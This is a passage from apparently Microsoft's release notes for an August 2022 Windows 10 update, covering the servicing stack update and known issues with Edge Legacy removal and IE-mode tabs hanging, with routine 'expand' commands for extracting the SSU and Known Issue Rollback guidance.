the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [August 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>). \n\n### Windows 10 servicing stack update - 19042.1852, 19043.1852, and 19044.1852\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab &lt;destination path&gt;**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* &lt;destination path&gt;**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \n| \nAfter installing this update, IE mode tabs in Microsoft Edge might stop responding when a site displays a modal dialog box. A modal dialog box is a form or dialog box that requires the user to respond before continuing or interacting with other portions of the webpage or app. **Developer Note** Sites affected by this issue call **window.focus**.| This issue is addressed in KB5016688. If you do not want to install this release, see the instructions below.This issue is resolved using [Known Issue Rollback (KIR)](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/known-issue-rollback-helping-you-keep-windows-devices-protected/ba-p/2176831>). Please note that it might take up to 24 hours for the resolution to propagate automatically to consumer devices and non-managed business devices. Restarting your Windows device might help the resolution apply to your device faster. For enterprise-managed devices that have installed an affected update and encountered this issue can resolve it by installing and configuring the special Group Policy listed below. For information on deploying and configuring these special Group Policy, please see [How to use Group Policy to deploy a Known Issue Rollback](<https://docs.microsoft.com/troubleshoot/windows-client/group-policy/use-group-policy-to-deploy-known-issue-rollback>). Group Policy download with Group Policy name: \n\n * [Download for Windows 10, version 20H2 and Windows 10, version 21H1 - ](<https://download.microsoft.com/download/8/8/0/88004bea-c83b-4d0c-9ac9-1996644578e9/Windows%2010%2020H2,%2021H1%20and%2021H2%20KB5014023%20220624_22551%20